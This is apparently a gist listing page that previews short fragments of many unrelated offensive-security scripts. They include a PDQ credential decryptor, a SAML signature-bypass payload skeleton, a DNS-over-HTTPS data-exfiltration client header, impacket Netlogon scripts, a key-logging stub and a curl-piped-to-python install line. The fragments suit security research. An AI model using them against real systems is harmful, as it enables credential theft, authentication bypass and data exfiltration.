| import hashlib | |
| import struct | |
| import argparse | |
| from Crypto.Cipher import AES #pip install pycryptodome | |
| def decrypt(blob, key): | |
| """Decrypt PDQ credential blobs""" | |
| #Format for the blob is [header][ivlen][iv][encdata] | |
| #Example blob: 28656e63727970746564290010644d18eb7817dad6de5f531b1b0b60113087662f3cf0ffdaa7760418c15ee6ea | |
| #Example blob: [28656e637279707465642900][10][644d18eb7817dad6de5f531b1b0b6011][3087662f3cf0ffdaa7760418c15ee6ea] |
CVE-2025-3155 affects Yelp which is The Gnome's user help application. It's installed by default on Ubuntu desktop.
A URI scheme is the part of a Uniform Resource Identifier (URI) that identifies a protocol or a specific application (steam://run/1337) that should handle the resource identified by the URI. It's the part that comes before the colon (://).
| Import-Module Az | |
| Connect-AzAccount | |
| $ipre = "^((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$" | |
| function Get-ClassicOrigins() { | |
| $profs = Get-AzCDNProfile | |
| $coll = @() | |
| foreach ($prof in $profs) { |
| import base64 | |
| import urllib.parse | |
| SKELETON_PAYLOAD = """<?xml version="1.0" encoding="UTF-8"?> | |
| <!DOCTYPE xml SYSTEM 'x" ><!--'> | |
| FAKE_ASSERTION | |
| <![CDATA[--> | |
| REAL_ASSERTION | |
| <!--]]>--></saml2p:Response> | |
| """ |
| """ | |
| Author : Hossam Ehab | |
| Info : Stealthy Data Exfiltration Using (DoH) - Client Code | |
| Date : May 26, 2024 | |
| """ | |
| import os, glob, requests, logging, struct, base64, random, time, httpx | |
| from datetime import datetime | |
| import urllib3 | |
| import win32com.client |
| ################################################## | |
| # Extra tools | |
| # $ sudo apt install -y xclip grc gobuster rlwrap evil-winrm powercat seclists peass raven | |
| # urlencode: | |
| # $ sudo apt install gridsite-clients | |
| # Install flatpak | |
| # -> https://www.kali.org/docs/tools/flatpak/ | |
| # Python2 pip | |
| # $ sudo sh -c "curl https://bootstrap.pypa.io./pip/2.7/get-pip.py | python2" | |
| # Cool Hollywood screensaver ❤️ |
| from impacket.dcerpc.v5 import epm, lsad, rpcrt, transport, lsat, ndr, nrpc | |
| from impacket.uuid import bin_to_uuidtup | |
| from binascii import unhexlify | |
| from random import randbytes | |
| import sys | |
| # Perform a lsarlookupsids3 with a trust account, it uses netlogon as SSP (see [MS-NRPC] 3.3) | |
| # Pure TCP RPC is used (ncacn_ip_tcp option) | |
| # RC4 is used here because to use AES, impacket must be patched | |
| # Tested with impacket 0.12.0 on GOAD |
| #include <stdio.h> | |
| #include <windows.h> | |
| #pragma comment(lib, "winmm.lib") | |
| void Nothing(WORD wKey) | |
| { | |
| } | |
| void PrintKey(WORD wKey) |
| ### USAGE: | |
| ### | |
| ### GetTracelogProviderSecurity.ps1 (to get all provider info) | |
| ### | |
| ### GetTracelogProviderSecurity.ps1 -ProviderName f2e68291-2367-5d51-3488-46f7a0e3f2cf | |
| ### (to get the info for 1 provider guid) | |
| ## | |
| # | |
| # Provider: f2e68291-2367-5d51-3488-46f7a0e3f2cf | |
| # Control Flags: 45076 |
| from impacket.dcerpc.v5 import epm, lsad, rpcrt, transport, lsat, ndr, nrpc | |
| from impacket.uuid import bin_to_uuidtup | |
| from binascii import unhexlify, hexlify | |
| from struct import pack, unpack | |
| from random import randbytes | |
| import sys | |
| # Perform a netrlogonsamlogonwithflags with a server account, it uses netlogon as SSP (see [MS-NRPC] 3.3) | |
| # Pure TCP RPC is used (ncacn_ip_tcp option) | |
| # RC4 is used here because to use AES, impacket must be patched |
